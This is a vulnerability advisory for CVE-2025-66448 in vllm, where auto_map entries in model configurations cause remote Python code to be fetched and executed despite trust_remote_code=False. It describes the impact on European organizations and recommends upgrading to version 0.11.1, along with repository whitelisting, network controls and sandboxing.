CVE-2025-66448 is a critical remote code execution vulnerability found in the vllm-project's vllm inference and serving engine for large language models (LLMs). The vulnerability exists in versions prior to 0.11.1 within the Nemotron_Nano_VL_Config class. When vllm loads a model configuration containing an auto_map entry, it resolves this mapping using the function get_class_from_dynamic_module(...), which fetches and executes Python code from a remote repository specified by the auto_map string. Crucially, this execution occurs even if the caller explicitly sets trust_remote_code=False, which is intended to prevent execution of untrusted remote code. This design flaw allows an attacker to publish a seemingly benign frontend repository whose config.json references a malicious backend repository via auto_map. When a victim loads this frontend repository, the backend’s malicious code is silently executed on the victim’s host system. This leads to arbitrary code execution with the privileges of the process running vllm. The vulnerability requires network access to fetch the remote code and low privileges but does require user interaction to load the malicious model configuration. The CVSS v3.1 score is 7.1, reflecting high severity due to the potential for full system compromise, affecting confidentiality, integrity, and availability. No known exploits have been reported in the wild as of the publication date, but the vulnerability poses a significant risk given the increasing use of vllm for AI model inference. The issue is resolved in vllm version 0.11.1, which properly respects the trust_remote_code setting and prevents remote code execution via auto_map entries.

For European organizations, the impact of CVE-2025-66448 can be severe, especially for those deploying vllm for AI model inference and serving. Successful exploitation allows attackers to execute arbitrary code remotely, potentially leading to data breaches, unauthorized access to sensitive information, disruption of AI services, and lateral movement within networks. This could compromise intellectual property, customer data, and critical AI-driven business processes. The vulnerability undermines trust in AI model supply chains by enabling malicious code injection through model configurations. Organizations relying on AI for decision-making, automation, or customer interaction may face operational downtime and reputational damage. Additionally, regulatory compliance risks arise under GDPR if personal data confidentiality is breached. The requirement for user interaction to load malicious configurations suggests targeted attacks, possibly via supply chain or insider threats. Given the growing adoption of AI technologies in Europe, the vulnerability poses a strategic risk to sectors such as finance, healthcare, manufacturing, and government services that increasingly integrate LLMs into their infrastructure.

European organizations should immediately upgrade all vllm deployments to version 0.11.1 or later to eliminate this vulnerability. Until upgrades are completed, organizations must implement strict validation and whitelisting of model configurations and repositories before loading them into vllm, ensuring only trusted sources are used. Network controls should be enforced to restrict vllm’s ability to fetch code from untrusted external repositories, including firewall rules and proxy filtering. Monitoring and alerting for unusual outbound connections from vllm hosts can help detect exploitation attempts. Additionally, organizations should adopt supply chain security best practices, such as verifying the provenance and integrity of AI model repositories and using cryptographic signatures where possible. Educating developers and data scientists about the risks of loading untrusted model configurations is critical. Finally, consider isolating vllm inference environments using containerization or sandboxing to limit the impact of potential code execution.